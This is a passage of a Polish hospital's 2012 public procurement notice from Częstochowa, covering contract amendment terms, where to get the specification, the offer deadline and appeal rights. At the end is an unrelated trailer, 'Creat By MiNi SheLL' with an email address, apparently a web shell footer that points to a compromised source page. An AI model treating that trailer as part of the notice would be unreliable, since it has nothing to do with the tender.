8.	Adres strony na której będzie prowadzona aukcja: http:www.soldea.pl .</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>3.	Zmiany istotnych postanowień umowy mogą dotyczyć:
1)	zmiany parametrów technicznych przedmiotu zamówienia, jeśli przyczyni się to do poprawy jakości zamówienia, przy czym zmiana ta nie spowoduje zwiększenia kosztów realizacji zamówienia,
2)	obniżenia przez Wykonawcę cen asortymentu będącego przedmiotem umowy.
3)	zmiany stawki podatku VAT od towarów i usług za przedmiot zamówienia, pod warunkiem niezmienności ceny brutto oferty.  
4.	Zmiany umowy o których mowa w § 12 ust. 2 i 3 mogą nastąpić wyłącznie w formie pisemnego aneksu, podpisanego przez obie Strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalparkitka.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpitala Specjalistyczny im. NMP, 42-200 Częstochowa ul. Bialska 104/118, Dział Zamówien Publicznych, pokój 310, II piętro, Pawilon D.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.08.2012 godzina 10:00, miejsce: Wojewódzki Szpitala Specjalistyczny im. NMP, 42-200 Częstochowa ul. Bialska 104/118, KANCELARIA, pokój 356, II piętro, Pawilon D.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Specyfikacja Istotnych Warunków Zamówienia(dalej SIWZ)będzie dostępna na stronie internetowej Zamawiającego: www.szpitalparkitka.com.pl. Na tej stronie Zamawiający będzie również zamieszczał pytania i odpowiedzi, SIWZ, odwołania dot. treści ogłoszenia oraz postanowień SIWZ,ogłoszenie o o wyborze najkorzystniejszej oferty. Wykonawcy , a także innemu podmiotowi, jeżeli ma lub miał interes prawny w uzyskaniu danego zamówienia oraz poniósł lub może ponieść szkodę w wyniku naruszenia przez Zamawiającego przepisów ustawy -Prawo zamówień publicznych, na podstawie art.180 ust.2 ustawy z dnia 29 stycznia 2004r- Prawo zamówień publicznych(tekst jedn.Dz.U.z 2010r Nr 113 , poz.759 z póź. zm.) przysługuje odwołanie wyłącznie wobec czynności:1)opisu sposobu dokonywania oceny spełniania warunków udziału postepowaniu;2)wykluczenia odwołującego z postepowania o udzielenie zamówienia;3)odrzucenia oferty odwołującego;.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com